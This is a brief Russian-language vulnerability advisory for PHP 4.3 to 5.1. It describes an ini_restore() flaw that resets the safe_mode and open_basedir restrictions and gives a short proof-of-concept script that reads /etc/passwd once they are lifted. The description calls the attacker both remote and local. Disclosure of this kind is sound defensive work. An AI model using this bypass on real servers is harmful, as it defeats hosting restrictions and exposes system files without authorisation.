Программа:
PHP 4.3.x
PHP 4.4.x
PHP 5.0.x
PHP 5.1.x
Уязвимость позволяет удаленному пользователю обойти существующие механизмы безопасности на целевой системе. Уязвимость существует из-за ошибки в функции "ini_restore()". Локальный злоумышленник может передать специально сформированный данные в уязвимую функцию, что позволит сбросить определенные настройки безопасности в значения по умолчанию в конфигурационном файле php.ini.
Пример:
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
?>